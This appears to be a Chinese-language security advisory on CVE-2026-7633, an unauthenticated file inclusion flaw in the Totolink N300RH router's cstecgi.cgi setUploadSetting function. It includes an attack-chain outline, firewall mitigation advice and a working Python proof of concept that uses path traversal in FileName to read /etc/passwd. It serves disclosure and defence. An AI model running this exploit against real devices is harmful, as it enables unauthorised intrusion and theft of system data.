CVE-2026-7633 CVSS 6.5 中危

CVE-2026-7633 Totolink N300RH 文件包含漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7633

漏洞类型

文件包含

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Totolink N300RH

漏洞概述

Totolink N300RH路由器（版本6.1c.1353_B20190305）的/cgi-bin/cstecgi.cgi接口存在安全漏洞。攻击者无需认证即可远程利用setUploadSetting函数中的FileName参数缺陷，导致文件包含攻击，进而可能读取敏感文件或影响系统完整性。

技术细节

该漏洞源于Totolink N300RH设备在处理文件上传设置时的逻辑缺陷。具体来说，/cgi-bin/cstecgi.cgi脚本中的setUploadSetting函数未对用户输入的FileName参数进行严格的边界检查和路径过滤。攻击者可以通过发送特制的HTTP POST请求，在FileName参数中注入路径遍历字符（如../）或特定文件路径。由于无需用户交互和身份验证（PR:N），远程攻击者可利用此漏洞包含服务器上的任意文件（如/etc/passwd或配置文件），导致信息泄露或潜在的代码执行风险。目前公开的PoC已证实该漏洞的可利用性。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络寻找暴露的Totolink N300RH设备，确认目标版本为6.1c.1353_B20190305。

STEP 2

2. 漏洞利用

攻击者向/cgi-bin/cstecgi.cgi发送包含恶意FileName参数的POST请求，触发文件包含漏洞。

STEP 3

3. 达成效果

服务器解析恶意请求，返回目标文件内容或执行恶意操作，导致信息泄露或完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_ip):
    # Target endpoint
    url = f"http://{target_ip}/cgi-bin/cstecgi.cgi"
    
    # Headers
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    }
    
    # Malicious payload targeting the FileName parameter
    # Attempting to include a sensitive file using path traversal
    data = {
        "function": "setUploadSetting",
        "FileName": "../../../../etc/passwd"
    }
    
    try:
        response = requests.post(url, data=data, headers=headers, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Response:")
            print(response.text)
        else:
            print(f"[-] Server returned status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "192.168.0.1" # Replace with actual target IP
    exploit(target)

影响范围

Totolink N300RH 6.1c.1353_B20190305

防御指南

临时缓解措施

如果无法立即升级，建议在防火墙中禁用对路由器Web管理端口（默认80/443）的外部访问，仅允许内网可信IP地址进行管理操作，以阻断远程无认证攻击。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7633
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7633
3 Details https://www.cvedetails.com/cve/CVE-2026-7633/
4 VulDB https://vuldb.com/cve/CVE-2026-7633
5 Link https://github.com/xyh4ck/iot_poc/tree/main/TOTOLINK/N300RHv4/03_setUploadSetting_ECFNP
6 Link https://vuldb.com/submit/806597
7 Link https://vuldb.com/vuln/360579
8 Link https://vuldb.com/vuln/360579/cti
9 Link https://www.totolink.net/

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表